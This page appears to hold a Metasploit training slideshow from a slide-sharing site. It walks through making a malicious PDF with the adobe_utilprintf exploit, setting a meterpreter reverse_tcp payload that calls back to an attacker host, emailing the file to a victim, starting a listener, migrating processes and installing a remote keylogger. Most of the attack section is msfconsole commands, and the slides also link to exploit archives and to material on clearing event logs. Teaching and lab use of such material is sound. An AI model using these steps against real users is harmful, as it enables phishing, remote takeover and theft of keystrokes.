METASPLOIT.

Slides:



Advertisements
Similar presentations
COMPANY LOGO HERE Getting Started 1. Download the setup file: Go to Click on the Visit Setup Page link (includes Java.
Advertisements

Lecture Materials for the John Wiley & Sons book: Cyber Security: Managing Networks, Conducting Tests, and Investigating Intrusions October 12, 2014 DRAFT1.
Part 2 Penetration Testing. Review 2-minute exercise: RECON ONLY Find 3x IP addresses at the U.S. Merchant Marine Academy Google: “U.S. Merchant Marine.
 Copyright 2005 Digital Enterprise Research Institute. All rights reserved. The Web Services Modeling Toolkit Mick Kerrigan.
Learning Unix/Linux Bioinformatics Orientation 2008 Eric Bishop.
A Complete Tool For System Penetration Testing Presented By:- Mahesh Kumar Sharma B.Tech IV Year Computer Science Roll No. :- CS09047.
Metasploit – Embedded PDF Exploit Presented by: Jesse Lucas.
RAPIDS Server Author: Anna Bekkerman
Browser Exploitation Framework (BeEF) Lab
MCTS Guide to Microsoft Windows Server 2008 Network Infrastructure Configuration Chapter 8 Introduction to Printers in a Windows Server 2008 Network.
Activating Pilot Account ( first time users ) Web-based Activation Browse to 1. Click on the link on the lower right that says.
Reproducible Environment for Scientific Applications (Lab session) Tak-Lon (Stephen) Wu.
7/17/2009 rwjBROOKDALE COMMUNITY COLLEGE1 Unix Comp-145 C HAPTER 2.
Automating Student Course Profile & Student Record Report Uploads to GaDOE Chris A. McManigal Camden County Schools Kingsland, GA.
A crash course in njit’s Afs
Dennis  Application Security Specialist  WhiteHat Security  Full-Time Student  University of Houston – Main Campus ▪ Computer.
Forensic Artifacts From A Pass The Hash (PtH) Attack
4/13/2010.  CSS Meeting  Stephen Crane on Programming Contests  1pm  Building 8 room /11/10.
Configuring the MagicInfo Pro Display
Kaseya Fundamentals Workshop Developed by Kaseya University Powered by IT Scholars Kaseya Version 6.5 Last updated March, 2014 DAY FOUR.
1 Guide to Novell NetWare 6.0 Network Administration Chapter 11.
SUSE Linux Enterprise Server Administration (Course 3037) Chapter 4 Manage Software for SUSE Linux Enterprise Server.
Objectives Define IP Address To be able to assign an IP address with its Subnet Mask and Default Gateway to a PC that operates using Windows 7 or Fedora.
MIS Week 2 Site:
EECS 354 Network Security Metasploit Features. Hacking on the Internet Vulnerabilities are always being discovered 0day vulnerabilities Every server or.
File Recovery and Forensics
®® Microsoft Windows 7 for Power Users Tutorial 13 Using the Command-Line Environment.
2. Introduction to the Visual Studio.NET IDE. Chapter Outline Overview of the Visual Studio.NET IDE Overview of the Visual Studio.NET IDE Menu Bar and.
Old Chapter 10: Programming Tools A Developer’s Candy Store.
1 INFO 321 Server Technologies II FTP Material adapted from Dr. Randy Kaplan.
MIS Week 1 Site:
UNIX Commands. Why UNIX Commands Are Noninteractive Command may take input from the output of another command (filters). May be scheduled to run at specific.
Prachi Chitnis.  The CSS feel  SDS – Synoptic Display Studio  ADL Converter  PV table, Probe…
Agenda Link of the week Use of Virtual Machine Review week one lab assignment This week’s expected outcomes Review next lab assignments Break Out Problems.
Guide to Linux Installation and Administration1 Chapter 4 Running a Linux System.
EMT 2390L Lecture 5 Dr. Reyes Reference: The Linux Command Line, W.E. Shotts.
Penetration Testing 101 (Boot-camp)
WDO-It! 102 Workshop: Using an abstraction of a process to capture provenance UTEP’s Trust Laboratory NDR HP MP.
Introduction to Programming Using C An Introduction to Operating Systems.
Linux Services Configuration
SAN DIEGO SUPERCOMPUTER CENTER Administering Inca with incat Jim Hayes Inca Workshop September 4-5, 2008.
CNIT 124: Advanced Ethical Hacking Ch 10: Client-Side Exploitation.
Linux Commands C151 Multi-User Operating Systems.
RT-LAB Electrical Applications 1 Opal-RT Technologies Use of the “Store Embedded” mode Solution RT-LAB for PC-104.
Surya Bahadur Kathayat Outline  Ramses  Installing Ramses  Ramses Perspective (Views and Editors)  Importing/Exporting Example.
THE C PROGRAMMING ENVIRONMENT. Four parts of C environment  Main menu  Editor status line and edit window  Compiler message window  “Hot Keys” quick.
MIS Week 1 Site:
Lab 8 Overview Apache Web Server. SCRIPTS Linux Tricks.
Learn R Toolkit D Kelly O'DayInstall & SetupMod 1 - Setup: 1 Module 1 Installing & Setting Up R Do See & HearRead Learn PowerPoint must be in View Show.
Linux Tutorial Lesson Two *Getting Help in Linux *Data movement and manipulation *Relative and Absolute path *Processes Note: see chapter 1,2,3 from Linux.
Learning Unix/Linux Based on slides from: Eric Bishop.
CACI Proprietary Information | Date 1 PD² SR13 Client Upgrade Name: Semarria Rosemond Title: Systems Analyst, Lead Date: December 8, 2011.
Penetration Testing with METASPLOIT Am Chaitanya Krishna. A.
Assignprelim.1 Assignment Preliminaries © 2012 B. Wilkinson/Clayton Ferner. Modification date: Jan 16a, 2014.
Tactical Meterpreter Scripting Carlos PerezDarkoperatorCarlos_perez[at]darkoperator.com DarkoperatorCarlos_perez[at]darkoperator.com.
Penetration Testing Exploiting 2: Compromising Target by Metasploit tool CIS 6395, Incident Response Technologies Fall 2016, Dr. Cliff Zou
Metasploit Framework (MSF) Fundamentals
PART 1 – FILE UPLOAD BACKDOORS: METASPLOIT
Computer System Laboratory
Malware Reverse Engineering Process
Metasploit a one-stop hack shop
Module 22 (Metasploit Introduction)
Laura Jaideny Pérez Gómez - A
CIT 480: Securing Computer Systems
Metasploit Project For this exploit I will be using the following strategy Create backdoor exe file Upload file to website Have victim computer download.
Bomgar Remote support software
Exploring the Power of EPDM Tasks - Working with and Developing Tasks in EPDM By: Marc Young XLM Solutions
Web Application Penetration Testing ‘17
Intro to Kali Linux & Tools
Penetration Testing & Network Defense
Presentation transcript:

METASPLOIT

WHAT IS METASPLOIT? Metasploit is a framework for creating exploits Written in Ruby Created originally by HD Moore Many Developers Worldwide Commercial Version available from Rapid7 HD Moore James Lee Joshua J. Drake Mike Smith Tod Beardsley Jon Cran MC Ramon Valle Patrick Webster Efrain Torres Stephen Fewer Lurene Grenier Steve Tornio Nathan Keltner I)ruid Chris Gates Kris Katterjohn Carlos Perez

Metasploit Pro

TODAYS OBJECTIVES Create a Malicious PDF file Have a user (victim) open that file Change process ID so we have continued access to the victim Gather info from the victim via a keylogger

BASIC STEPS The basic format for exploiting a system: Pick which exploit to use Configure the exploit Pick a payload Configure the payload Execute the exploit

STARTING METASPLOIT Open a terminal session Make sure you are in the right directory Type “sudo msfconsole” at the command line Updating Metasploit On the Windows platform, launch the Metasploit Update. On Linux simply enter msfupdate as root

STARTING METASPLOIT cont. Got cow?

CORE COMMANDS We will be using a limited command set in our lab today. Here are all the possible commands we could use. ? Help menu back Move back from the current context banner Display an awesome metasploit banner cd Change the current working directory color Toggle color connect Communicate with a host exit Exit the console help Help menu info Displays information about one or more module irb Drop into irb scripting mode jobs Displays and manages jobs kill kill a job load Load a framework plugin

CORE COMMANDS (cont.) loadpath Searches for and loads modules from a path quit Exit the console resource Run the commands stored in a file route Route traffic through a session save Saves the active datastores search Searches module names and descriptions sessions Dump session listings and display information about sessions set Sets a variable to a value setg Sets a global variable to a value show Displays modules of a given type, or all modules sleep Do nothing for the specified number of seconds unload Unload a framework plugin unset Unsets one or more variables unsetg Unsets one or more global variables use Selects a module by name version Show the framework and console library version numbers

CREATE MALICIOUS PDF Create PDF Include Meterpreter payload Email Malicious PDF to victim

CREATING PDF uopadmin@Attacker1:~# sudo msfconsole msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) >

CREATING PDF cont.

CREATING PDF cont. msf exploit(adobe_utilprintf) > info msf exploit(adobe_utilprintf) > set OUTPUTPATH ~ OUTPUTPATH => ~ msf exploit(adobe_utilprintf) > set filename help.pdf filename => help.pdf msf exploit(adobe_utilprintf) > show payloads msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 192.168.0.x LHOST => 192.168.0.x msf exploit(adobe_utilprintf) > set LPORT 80 LPORT => 80 msf exploit(adobe_utilprintf) > exploit

VICTIM RECEIVES FILE Victim opens file Exploit is launched Connection made back to badguy machine Begin using Meterpreter

USING METERPRETER Changing process ID Installing a key logger remotely

EXPLOITING msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LPORT=80 LHOST=192.168.0.201 E

CHANGING PROCESS ID USING METERPRETER sysinfo: Show the system name and OS type ps: Show process IDs getpid: Show the process ID of meterpreter migrate: Migrate to another process ID

INSTALL KEYLOGGER VIA METERPRETER keyscan_start: Start key logger keyscan_dump: Read key logger data

USEFUL LINKS ### Main site http://www.metasploit.com ### User Guide http://www.metasploit.com/documents/users_guide.pdf ### Wiki http://www.metasploit.com/redmine/projects/framework/wiki/Page_index ### exploits and POCs http://milw0rm.com/exploits/ Metasploit PDF Exploit http://carnal0wnage.blogspot.com/2008/11/metasploit-adobe-utilprintf-client-side.html ### VNC Word Macro Exploit http://devilz-kiddies.blogspot.com/2009/09/metasploit-reverse-vnc-hidden-in-word.html ### Module Info http://www.metasploit.com/modules/ ### clearing event logs http://seclists.org/metasploit/2008/q4/153 ### exe2vba http://www.securiteam.com/tools/5KP0J2KFPQ.html http://www.metasploit.com/redmine/projects/framework/repository/revisions/6708/entry/tools/exe2vba.rb

CONTACT INFO ub0wn3d@gmail.com (that’s a zero)

Feedback: Privacy Policy Feedback
Do Not Sell My Personal Information
About project: SlidePlayer Terms of Service

© 2025 SlidePlayer.com. Inc. All rights reserved.